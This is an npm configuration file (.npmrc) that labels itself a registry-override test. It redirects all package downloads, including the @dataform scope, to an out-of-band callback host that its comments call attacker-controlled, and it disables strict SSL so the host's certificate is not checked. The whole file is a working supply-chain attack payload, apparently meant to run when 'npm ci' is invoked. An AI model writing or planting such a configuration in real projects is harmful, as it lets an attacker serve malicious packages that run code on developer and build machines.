# npm Registry Override Test
# If npm reads this file during 'npm ci', it will contact our OAST server
# This tests if we can redirect package downloads to attacker-controlled registry

# Global registry override (all packages)
registry=https://juolbtoughjktrdppdvuqemhwftehn8z6.oast.fun/npm-registry/

# Scoped registry override (@dataform packages)
@dataform:registry=https://juolbtoughjktrdppdvuqemhwftehn8z6.oast.fun/dataform-scoped/

# Disable strict SSL (in case OAST doesn't have valid cert)
strict-ssl=false

# Log level for debugging
loglevel=verbose
